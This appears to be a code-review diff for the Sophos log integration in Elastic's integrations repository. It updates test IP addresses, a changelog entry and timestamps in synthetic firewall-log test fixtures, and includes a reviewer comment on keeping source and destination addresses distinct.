 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6
-<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3
+<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3
 <30>device="SFW" date=2017-02-01 time=14:17:35 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=2
 <30>device="SFW" date=2017-02-01 time=14:19:47 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=3
diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml
index e941ed0fa27..6b684c00e56 100644
--- a/packages/sophos/changelog.yml
+++ b/packages/sophos/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.1.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.1.0"
 changes:
 - description: Add 8.0.0 version constraint
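Review bot: The Sandbox line at the top of this hunk swaps `src_ip=172.16.34.24`, a private RFC 1918 address, for the public test address, which goes beyond the stated goal of moving unsupported public IPs to the supported subset and removes the only Sandbox sample with an internal source. On the three WAF lines `sourceip=`, `localip=` and `host=` now all carry `175.16.199.1`, so a pipeline regression that swaps source and destination fields, or maps `host` to the wrong ECS field, would still pass this test. I would keep `src_ip=172.16.34.24` on the Sandbox line and give the server side a different value from the client side, for example `sourceip=175.16.199.1 localip=175.16.199.2`, assuming a second host in that block is also in the supported set.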
diff --git a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json index 8d31ba352c5..0674711607a 100644 --- a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "2016:1:29-06:09:59 localhost.localdomain smtpd[905]: MASTER[nnumqua]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-10-26T10:41:54.238959724Z" + "ingested": "2021-12-09T13:44:53.093892Z" }, "tags": [ "preserve_original_event" 
@@ -18,7 +18,7 @@ }, "message": "2016:2:12-13:12:33 astarosg_TVM[5716]: id=ommod severity=medium sys=inima sub=tlabo name=web request blocked, forbidden application detectedaction=accept method=ugiatnu client=stiae facility=nofdeF user=sunt srcip=10.57.170.140 dstip=10.213.231.72 version=1.5102 storage=emips ad_domain=imadmi object=ostrume class=molest type=upt attributes=uiineavocount=tisetq node=irati account=icistatuscode=giatquov cached=eritquii profile=dexeac filteraction=iscinge size=6992 request=oreseos url=https://mail.example.net/tati/utaliqu.html?iquaUten=santium#iciatisu referer=https://www5.example.org/eporroqu/uat.txt?atquovo=suntinc#xeac error=nidolo authtime=tatn dnstime=eli cattime=nnu avscantime=dolo fullreqtime=Loremip device=idolor auth=emeumfu ua=CSed exceptions=lupt group=psaquae category=oinBCSe categoryname=mnisist content-type=sedd reputation=uatD application=iunt app-id=temveleu reason=colabo filename=eme file=numqu extension=qui time=civeli function=block line=agnaali message=gnam fwrule=tat seq=ipitla initf=enp0s7281 outitf=enp0s7084 dstmac=01:00:5e:de:94:f6 srcmac=01:00:5e:1d:c1:c0 proto=den length=tutla tos=olorema prec=;iades ttl=siarchi srcport=2289 dstport=3920 tcpflags=mqu info=apariat prec=tlabore caller=untmolli engine=remi localip=saute host=ercit2385.internal.home extra=run server=10.47.202.102 cookie=quirat set-cookie=llu", "event": { - "ingested": "2021-10-26T10:41:54.238967575Z" + "ingested": "2021-12-09T13:44:53.093896500Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "2016:2:26-20:15:08 eirure7587.internal.localhost reverseproxy: [mpori] [aaliquaU:medium] [pid 3905:lpaqui] (22)No form context found: [client sitame] No form context found when parsing iadese tag, referer: https://api.example.com/utla/utei.htm?oei=tlabori#oin", "event": { - "ingested": "2021-10-26T10:41:54.238969458Z" + "ingested": "2021-12-09T13:44:53.093900100Z" }, "tags": [ "preserve_original_event" 
@@ -42,7 +42,7 @@ }, "message": "2016:3:12-03:17:42 data4478.api.lan confd: id=iquipex severity=very-high sys=uradip sub=wri name=bor client=occa facility=stquidol user=itquiin srcip=10.106.239.55 version=1.3129 storage=atevel object=nsecte class=itame type=eumfug attributes=litcount=asun node=estia account=eaq", "event": { - "ingested": "2021-10-26T10:41:54.238970905Z" + "ingested": "2021-12-09T13:44:53.093906100Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "2016:3:26-10:20:16 ctetura3009.www5.corp reverseproxy: [lita] [adeseru:medium] [pid 7692:eaq] amest configured -- corp normal operations", "event": { - "ingested": "2021-10-26T10:41:54.238972308Z" + "ingested": "2021-12-09T13:44:53.093910400Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "2016:4:9-17:22:51 localhost smtpd[1411]: MASTER[inculpa]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-10-26T10:41:54.238973712Z" + "ingested": "2021-12-09T13:44:53.093951600Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "2016:4:24-00:25:25 httpproxy[176]: [nse] disk_cache_zap (non) paquioff", "event": { - "ingested": "2021-10-26T10:41:54.238975095Z" + "ingested": "2021-12-09T13:44:53.093955200Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "2016:5:8-07:27:59 ptasnu6684.mail.lan reverseproxy: [orumSe] [boree:low] [pid 945:rQuisau] AH01915: Init: (10.18.13.211:205) You configured ofdeFini(irat) on the onev(aturauto) port!", "event": { - "ingested": "2021-10-26T10:41:54.238976493Z" + "ingested": "2021-12-09T13:44:53.093958900Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "2016:5:22-14:30:33 ssecillu7166.internal.lan barnyard: Initializing daemon mode", "event": { - "ingested": "2021-10-26T10:41:54.238978004Z" + "ingested": "2021-12-09T13:44:53.093963Z" }, "tags": [ "preserve_original_event" 
@@ -114,7 +114,7 @@ }, "message": "2016:6:5-21:33:08 ore5643.api.lan reverseproxy: [metco] [acom:high] [pid 2164:nim] ModSecurity: utaliqu compiled version=\"rsi\"; loaded version=\"taliqui\"", "event": { - "ingested": "2021-10-26T10:41:54.238979379Z" + "ingested": "2021-12-09T13:44:53.093967800Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "2016:6:20-04:35:42 ciun39.localdomain reverseproxy: [iatqu] [inBCSedu:high] [pid 4006:rorsit] AH00098: pid file tionemu overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-10-26T10:41:54.238980805Z" + "ingested": "2021-12-09T13:44:53.093971900Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "2016:7:4-11:38:16 atatnon6064.www.invalid reverseproxy: [magnid] [adol:low] [pid 1263:roide] AH00291: long lost child came home! (pid tem)", "event": { - "ingested": "2021-10-26T10:41:54.238982391Z" + "ingested": "2021-12-09T13:44:53.093977400Z" }, "tags": [ "preserve_original_event" @@ -150,7 +150,7 @@ }, "message": "2016:7:18-18:40:50 gitse2463.www5.invalid aua: id=tvolup severity=low sys=sci sub=col name=web request blocked srcip=10.42.252.243 user=agnaaliq caller=est engine=mquisno", "event": { - "ingested": "2021-10-26T10:41:54.238983824Z" + "ingested": "2021-12-09T13:44:53.093981400Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "2016:8:2-01:43:25 httpproxy[2078]: [mol] sc_server_cmd (umdolors) decrypt failed", "event": { - "ingested": "2021-10-26T10:41:54.238985234Z" + "ingested": "2021-12-09T13:44:53.093986300Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "2016:8:16-08:45:59 oriosam6277.mail.localdomain frox: Listening on 10.169.5.162:6676", "event": { - "ingested": "2021-10-26T10:41:54.238986776Z" + "ingested": "2021-12-09T13:44:53.093990300Z" }, "tags": [ "preserve_original_event" 
@@ -186,7 +186,7 @@ }, "message": "2016:8:30-15:48:33 ptate3830.internal.localhost reverseproxy: [quamqua] [ntut:high] [pid 5996:meum] AH02572: Failed to configure at least one certificate and key for mini:Loremip", "event": { - "ingested": "2021-10-26T10:41:54.238988168Z" + "ingested": "2021-12-09T13:44:53.093995100Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "2016:9:13-22:51:07 nvo6105.invalid reverseproxy: [amquaer] [aqui:medium] [pid 3340:lpa] AH00020: Configuration Failed, isn", "event": { - "ingested": "2021-10-26T10:41:54.238989678Z" + "ingested": "2021-12-09T13:44:53.093999100Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "2016:9:28-05:53:42 afcd[2492]: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-10-26T10:41:54.238991078Z" + "ingested": "2021-12-09T13:44:53.094003900Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "2016:10:12-12:56:16 edic2758.api.domain confd: id=olabori severity=medium sys=atatnon sub=lica name=secil client=uisnos facility=olores user=scipit srcip=10.54.169.175 version=1.5889 storage=onorumet object=ptatema class=eavolup type=ipsumq attributes=evitcount=tno node=iss account=taspe", "event": { - "ingested": "2021-10-26T10:41:54.238992517Z" + "ingested": "2021-12-09T13:44:53.094007900Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "2016:10:26-19:58:50 aua[32]: id=mmo severity=high sys=tlaboru sub=aeabillo name=checking if admin is enabled srcip=10.26.228.145 user=eruntmo caller=nimve engine=usanti", "event": { - "ingested": "2021-10-26T10:41:54.238993952Z" + "ingested": "2021-12-09T13:44:53.094012800Z" }, "tags": [ "preserve_original_event" 
@@ -246,7 +246,7 @@ }, "message": "2016:11:10-03:01:24 sshd[2051]: Server listening on 10.59.215.207 port 6195.", "event": { - "ingested": "2021-10-26T10:41:54.238995323Z" + "ingested": "2021-12-09T13:44:53.094016800Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "2016:11:24-10:03:59 ectobeat3157.mail.local reverseproxy: [uasiarch] [Malor:low] [pid 170:cillumdo] AH02312: Fatal error initialising mod_ssl, ditau.", "event": { - "ingested": "2021-10-26T10:41:54.238996701Z" + "ingested": "2021-12-09T13:44:53.094021500Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "2016:12:8-17:06:33 ident2323.internal.corp reverseproxy: [hend] [remagna:high] [pid 873:aparia] AH01909: 10.144.21.112:90:epteurs server certificate does NOT include an ID which matches the server name", "event": { - "ingested": "2021-10-26T10:41:54.238998072Z" + "ingested": "2021-12-09T13:44:53.094025500Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "2016:12:23-00:09:07 ttenb4581.www.host httpproxy: [rem] main (exer) shutdown finished, exiting", "event": { - "ingested": "2021-10-26T10:41:54.238999588Z" + "ingested": "2021-12-09T13:44:53.094030600Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "2017:1:6-07:11:41 lapari5763.api.invalid frox: Listening on 10.103.2.48:4713", "event": { - "ingested": "2021-10-26T10:41:54.239000967Z" + "ingested": "2021-12-09T13:44:53.094034600Z" }, "tags": [ "preserve_original_event" 
@@ -306,7 +306,7 @@ }, "message": "2017:1:20-14:14:16 elites4713.www.localhost ulogd: id=serr severity=very-high sys=olore sub=onemul name=portscan detected action=deny fwrule=remeum seq=etur initf=lo6086 outitf=lo272 dstmac=01:00:5e:51:b9:4d srcmac=01:00:5e:15:3a:74 srcip=10.161.51.135 dstip=10.52.190.18 proto=isni length=quid tos=aUten prec=Duis ttl=uisq srcport=7807 dstport=165 tcpflags=accus info=CSed code=tiu type=wri", "event": { - "ingested": "2021-10-26T10:41:54.239002378Z" + "ingested": "2021-12-09T13:44:53.094039400Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "2017:2:3-21:16:50 sam1795.invalid reverseproxy: [lorese] [olupta:low] [pid 3338:iqui] AH02312: Fatal error initialising mod_ssl, animide.", "event": { - "ingested": "2021-10-26T10:41:54.239003759Z" + "ingested": "2021-12-09T13:44:53.094043400Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "2017:2:18-04:19:24 confd[10]: id=arch severity=high sys=data sub=ugits name=ittenb client=tobeatae facility=ntut user=llum srcip=10.232.108.32 version=1.5240 storage=idolo object=mqu class=mquido type=ende attributes=ntmollitcount=tisu node=ionofdeF account=rsp", "event": { - "ingested": "2021-10-26T10:41:54.239005245Z" + "ingested": "2021-12-09T13:44:53.094048300Z" }, "tags": [ "preserve_original_event" 
@@ -342,7 +342,7 @@ }, "message": "2017:3:4-11:21:59 nostrum6305.internal.localhost astarosg_TVM: id=llitani severity=high sys=itametco sub=etcons name=web request blocked, forbidden url detectedaction=allow method=iuntN client=utfugi facility=ursintoc user=tio srcip=10.89.41.97 dstip=10.231.116.175 version=1.5146 storage=lup ad_domain=mipsamv object=exeacomm class=sequines type=cto attributes=cusacount=nderi node=tem account=tcustatuscode=eumiu cached=nim profile=pteurs filteraction=ercitati size=835 request=ptat url=https://mail.example.net/velillu/ecatcupi.txt?rsitamet=leumiur#ssequamn referer=https://example.com/taliqui/idi.txt?undeomn=ape#itaspe error=ari authtime=umtot dnstime=onemulla cattime=atquo avscantime=borio fullreqtime=equatD device=uidol auth=inculpa ua=ruredol exceptions=iadeseru group=loremagn category=acons categoryname=nimadmi content-type=lapa reputation=emoenimi application=iquipex app-id=mqu reason=onorume filename=abill file=ametcon extension=ofdeFini time=tasnu function=deny line=tionev message=uasiarch fwrule=velites seq=uredolor initf=lo1543 outitf=lo6683 dstmac=01:00:5e:8c:f2:06 srcmac=01:00:5e:6f:71:02 proto=plica length=asiarc tos=lor prec=;nvolupt ttl=dquia srcport=5334 dstport=1525 tcpflags=umfugiat info=quisnos prec=utf caller=dolor engine=dexe localip=nemul host=Duis583.api.local extra=eavolupt server=10.17.51.153 cookie=aperiame set-cookie=stenat", "event": { - "ingested": "2021-10-26T10:41:54.239006658Z" + "ingested": "2021-12-09T13:44:53.094052300Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "2017:3:18-18:24:33 xeaco7887.www.localdomain aua: id=hite severity=very-high sys=ugitsed sub=dminimve name=Packet accepted srcip=10.137.165.144 user=uptate caller=tot engine=reme", "event": { - "ingested": "2021-10-26T10:41:54.239008073Z" + "ingested": "2021-12-09T13:44:53.094057100Z" }, "tags": [ "preserve_original_event" 
@@ -366,7 +366,7 @@ }, "message": "2017:4:2-01:27:07 reverseproxy[5430]: ARGS:userPermissions: [\\\\x22dashletAccessAlertingRecentAlertsPanel\\\\x22,\\\\x22dashletAccessAlerterTopAlertsDashlet\\\\x22,\\\\x22accessViewRules\\\\x22,\\\\x22deployLiveResources\\\\x22,\\\\x22vi...\"] [severity [hostname \"iscivel3512.invalid\"] [uri \"atcupi\"] [unique_id \"eriti\"]", "event": { - "ingested": "2021-10-26T10:41:54.239009463Z" + "ingested": "2021-12-09T13:44:53.094061200Z" }, "tags": [ "preserve_original_event" @@ -378,7 +378,7 @@ }, "message": "2017:4:16-08:29:41 sockd[6181]: dante/server 1.202 running", "event": { - "ingested": "2021-10-26T10:41:54.239010837Z" + "ingested": "2021-12-09T13:44:53.094068Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "2017:4:30-15:32:16 dolor5799.home afcd: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-10-26T10:41:54.239012212Z" + "ingested": "2021-12-09T13:44:53.094072200Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "2017:5:14-22:34:50 oreseosq1859.api.lan reverseproxy: [mmodic] [essequam:low] [pid 6691:ficiade] [client uiinea] [uianonn] virus daemon connection problem found in request https://www5.example.com/dantium/ors.htm?sinto=edi#eumiure, referer: https://example.com/adeser/mSe.gif?aute=rchite#rcit", "event": { - "ingested": "2021-10-26T10:41:54.239013606Z" + "ingested": "2021-12-09T13:44:53.094077Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "2017:5:29-05:37:24 confd-sync[6908]: id=smoditem severity=very-high sys=tev sub=oNemoeni name=luptatem", "event": { - "ingested": "2021-10-26T10:41:54.239015096Z" + "ingested": "2021-12-09T13:44:53.094081100Z" }, "tags": [ "preserve_original_event" 
@@ -426,7 +426,7 @@ }, "message": "2017:6:12-12:39:58 autodit272.www.localhost reverseproxy: [oriss] [imadmin:very-high] [pid 1121:urve] ModSecurity: sBonoru compiled version=\"everi\"; loaded version=\"squ\"", "event": { - "ingested": "2021-10-26T10:41:54.239016494Z" + "ingested": "2021-12-09T13:44:53.094086Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "2017:6:26-19:42:33 rporis6787.www5.localdomain reverseproxy: [quasiarc] [pta:low] [pid 3705:liqu] [client ipsu] AH01114: siarch: failed to make connection to backend: 10.148.21.7", "event": { - "ingested": "2021-10-26T10:41:54.239017870Z" + "ingested": "2021-12-09T13:44:53.094090300Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "2017:7:11-02:45:07 reprehe5661.www.lan reverseproxy: rManage\\\\x22,\\\\x22manageLiveSystemSettings\\\\x22,\\\\x22accessViewJobs\\\\x22,\\\\x22exportList\\\\...\"] [ver \"olor\"] [maturity \"corpo\"] [accuracy \"commod\"] iumd [hostname \"ntore4333.api.invalid\"] [uri \"sitv\"] [unique_id \"equam\"]", "event": { - "ingested": "2021-10-26T10:41:54.239019257Z" + "ingested": "2021-12-09T13:44:53.094095100Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "2017:7:25-09:47:41 exim[2384]: aeca-ugitse-ameiu utei:caecat:lumquid oluptat sequatD163.internal.example [10.151.206.38]:5794 lits", "event": { - "ingested": "2021-10-26T10:41:54.239020647Z" + "ingested": "2021-12-09T13:44:53.094099100Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "2017:8:8-16:50:15 elillu5777.www5.lan pluto: \"elaudant\"[olup] 10.230.4.70 #ncu: starting keying attempt quaturve of an unlimited number", "event": { - "ingested": "2021-10-26T10:41:54.239022018Z" + "ingested": "2021-12-09T13:44:53.094103400Z" }, "tags": [ "preserve_original_event" 
@@ -486,7 +486,7 @@ }, "message": "2017:8:22-23:52:50 ecatcup3022.mail.invalid xl2tpd: Inherited by nproide", "event": { - "ingested": "2021-10-26T10:41:54.239023418Z" + "ingested": "2021-12-09T13:44:53.094107400Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "2017:9:6-06:55:24 qui7797.www.host ipsec_starter: Starting strongSwan umet IPsec [starter]...", "event": { - "ingested": "2021-10-26T10:41:54.239024768Z" + "ingested": "2021-12-09T13:44:53.094111100Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "2017:9:20-13:57:58 nofdeFin2037.mail.example reverseproxy: [quatD] [nevol:high] [pid 3994:Sectio] [client tiumdol] [laud] cannot read reply: Operation now in progress (115), referer: https://example.org/tquov/natu.jpg?uianonnu=por#nve", "event": { - "ingested": "2021-10-26T10:41:54.239028112Z" + "ingested": "2021-12-09T13:44:53.094115Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "2017:10:4-21:00:32 sockd[7264]: dante/server 1.3714 running", "event": { - "ingested": "2021-10-26T10:41:54.239029550Z" + "ingested": "2021-12-09T13:44:53.094119800Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "2017:10:19-04:03:07 eFinib2403.api.example reverseproxy: [utaliq] [sun:high] [pid 4074:uredol] [client quatD] [enimad] ecatcu while reading reply from cssd, referer: https://mail.example.org/urautod/eveli.html?rese=nonproi#doconse", "event": { - "ingested": "2021-10-26T10:41:54.239030947Z" + "ingested": "2021-12-09T13:44:53.094123900Z" }, "tags": [ "preserve_original_event" 
@@ -546,7 +546,7 @@ }, "message": "2017:11:2-11:05:41 confd[4939]: id=acons severity=high sys=adipisc sub=omnisist name=orroqui client=sci facility=psamvolu user=itsedqui srcip=10.244.96.61 version=1.2707 storage=onevol object=ese class=reprehen type=Exce attributes=toccacount=tinvolu node=ecatc account=iumt", "event": { - "ingested": "2021-10-26T10:41:54.239034069Z" + "ingested": "2021-12-09T13:44:53.094128900Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "2017:11:16-18:08:15 named[1900]: reloading eddoei iono", "event": { - "ingested": "2021-10-26T10:41:54.239035475Z" + "ingested": "2021-12-09T13:44:53.094132900Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "2017:12:1-01:10:49 obeatae2042.www.domain reverseproxy: [dquian] [isaute:low] [pid 1853:utfugit] (70007)The ula specified has expired: [client quaUteni] AH01110: error reading response", "event": { - "ingested": "2021-10-26T10:41:54.239036871Z" + "ingested": "2021-12-09T13:44:53.094137900Z" }, "tags": [ "preserve_original_event" @@ -582,7 +582,7 @@ }, "message": "2017:12:15-08:13:24 aerat1267.www5.example pop3proxy: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239038237Z" + "ingested": "2021-12-09T13:44:53.094143600Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "2017:12:29-15:15:58 writt2238.internal.localdomain reverseproxy: [uaer] [aed:low] [pid 478:ain] [client scingeli] [uatDuis] mod_avscan_check_file_single_part() called with parameter filename=imip", "event": { - "ingested": "2021-10-26T10:41:54.239039603Z" + "ingested": "2021-12-09T13:44:53.094149200Z" }, "tags": [ "preserve_original_event" 
@@ -606,7 +606,7 @@ }, "message": "2018:1:12-22:18:32 siutaliq4937.api.lan reverseproxy: [siutaliq] [urvel:very-high] [pid 7721:ntium] [imadmi] Hostname in dquiac request (liquide) does not match the server name (uatD)", "event": { - "ingested": "2021-10-26T10:41:54.239041108Z" + "ingested": "2021-12-09T13:44:53.094154300Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "2018:1:27-05:21:06 URID[7596]: T=BCSedut ------ 1 - [exit] accept: ametco", "event": { - "ingested": "2021-10-26T10:41:54.239042484Z" + "ingested": "2021-12-09T13:44:53.094160100Z" }, "tags": [ "preserve_original_event" 
@@ -630,7 +630,7 @@ }, "message": "2018:2:10-12:23:41 astarosg_TVM[1090]: id=udex severity=low sys=iam sub=animi name=UDP flood detectedaction=allow method=nsectetu client=spici facility=untutl user=hen srcip=10.214.167.164 dstip=10.76.98.53 version=1.3726 storage=uovolup ad_domain=expl object=animi class=mdoloree type=mullamco attributes=tnulcount=ons node=radip account=amremapstatuscode=dolorsit cached=atisund profile=isnostru filteraction=quepo size=5693 request=nisi url=https://api.example.org/iono/secillum.txt?apariat=tse#enbyCi referer=https://example.com/eetdol/aut.jpg?pitlab=tutlabor#imadmi error=nculp authtime=quamnihi dnstime=nimadmi cattime=mquiado avscantime=agn fullreqtime=dip device=urmag auth=nim ua=laboreet exceptions=tutlabo group=incid category=der categoryname=totamrem content-type=eaqu reputation=itani application=mni app-id=runtmol reason=uaer filename=nor file=saut extension=olest time=volu function=block line=osam message=ncid fwrule=loremagn seq=uisau initf=lo1255 outitf=eth965 dstmac=01:00:5e:2f:c3:3e srcmac=01:00:5e:65:2d:fe proto=ictasun length=iumto tos=ciun prec=;prehe ttl=essec srcport=4562 dstport=2390 tcpflags=uaera info=nsequa prec=yCicero caller=orporis engine=oluptate localip=tesseq host=tenbyCi4371.www5.localdomain extra=spernatu server=10.98.126.206 cookie=tion set-cookie=tNeque", "event": { - "ingested": "2021-10-26T10:41:54.239043939Z" + "ingested": "2021-12-09T13:44:53.094165800Z" }, "tags": [ "preserve_original_event" 
@@ -642,7 +642,7 @@ }, "message": "2018:2:24-19:26:15 ulogd[6722]: id=persp severity=medium sys=orev sub=lapa name=Packet logged action=allow fwrule=adminim seq=isiutali initf=lo7088 outitf=eth6357 dstmac=01:00:5e:9a:fe:91 srcmac=01:00:5e:78:1a:5a srcip=10.203.157.250 dstip=10.32.236.117 proto=turm length=quamei tos=nvento prec=nama ttl=ema srcport=6585 dstport=5550 tcpflags=xeacomm info=oriosa code=erspici type=oreeu", "event": { - "ingested": "2021-10-26T10:41:54.239045329Z" + "ingested": "2021-12-09T13:44:53.094171700Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "2018:3:11-02:28:49 ectob5542.www5.corp reverseproxy: [agni] [ivelit:high] [pid 7755:uovol] AH00959: ap_proxy_connect_backend disabling worker for (10.231.77.26) for volups", "event": { - "ingested": "2021-10-26T10:41:54.239046770Z" + "ingested": "2021-12-09T13:44:53.094177400Z" }, "tags": [ "preserve_original_event" 
@@ -666,7 +666,7 @@ }, "message": "2018:3:25-09:31:24 iusmo901.www.home httpd: id=scivelit severity=high sys=untut sub=siu name=Authentication successfulaction=allow method=icons client=hende facility=umdol user=Sedutper srcip=10.2.24.156 dstip=10.113.78.101 version=1.2707 storage=amqua ad_domain=nsequatu object=aboNemoe class=mqu type=tse attributes=ntiumdcount=ueip node=amvo account=dolorsistatuscode=acc cached=quinesc profile=ulpaq filteraction=usa size=5474 request=tob url=https://www.example.org/imipsamv/doeiu.jpg?nderit=ficia#tru referer=https://mail.example.org/natuser/olupt.txt?ipsumqu=nsec#smo error=avolup authtime=litse dnstime=archit cattime=nde avscantime=tNequepo fullreqtime=byCicer device=imvenia auth=ipit ua=tdolorem exceptions=nderitin group=mquiado category=ssequa categoryname=nisist content-type=temvele reputation=ofd application=quam app-id=umdol reason=porincid filename=tisetqu file=pici extension=erit time=ehenderi function=block line=fugiatqu message=Duisaute fwrule=uptat seq=hende initf=lo3680 outitf=lo4358 dstmac=01:00:5e:0a:8f:6c srcmac=01:00:5e:34:8c:d2 proto=mnis length=ainci tos=aturve prec=;tiumdol ttl=mporain srcport=6938 dstport=6939 tcpflags=dut info=aecons prec=tionemu caller=edictasu engine=quipexea localip=orsit host=tenima5715.api.example extra=snisiut server=10.92.93.236 cookie=amr set-cookie=mfug port=7174 query=exerc uid=ntoccae", "event": { - "ingested": "2021-10-26T10:41:54.239048160Z" + "ingested": "2021-12-09T13:44:53.094183200Z" }, "tags": [ "preserve_original_event" 
@@ -678,7 +678,7 @@ }, "message": "2018:4:8-16:33:58 astarosg_TVM[6463]: id=user severity=low sys=sequamn sub=adeseru name=File extension warned and proceededaction=accept method=mquisn client=ulamcol facility=nulamcol user=atatno srcip=10.180.169.49 dstip=10.206.69.71 version=1.3155 storage=risni ad_domain=ccaecat object=dtemp class=onproid type=ica attributes=mnisiscount=edolor node=nonnumqu account=iscivelistatuscode=urve cached=sundeomn profile=tasu filteraction=equunt size=3144 request=ilmo url=https://mail.example.net/isqua/deF.html?iameaq=orainci#adm referer=https://api.example.org/mremap/ate.htm?tlabor=cidunt#ria error=tessec authtime=cupida dnstime=ciade cattime=busBonor avscantime=enima fullreqtime=emseq device=osamni auth=umetMa ua=equatDui exceptions=its group=setquas category=nti categoryname=osamnis content-type=atisetqu reputation=ciduntut application=atisu app-id=edutpe reason=architec filename=incul file=tevelit extension=emse time=eipsaqua function=cancel line=suntincu message=lore fwrule=equatu seq=enbyCi initf=enp0s566 outitf=lo2179 dstmac=01:00:5e:2c:9d:65 srcmac=01:00:5e:1a:03:f5 proto=orema length=iusmo tos=uunturm prec=;mSect ttl=avolupta srcport=3308 dstport=1402 tcpflags=dolo info=tsed 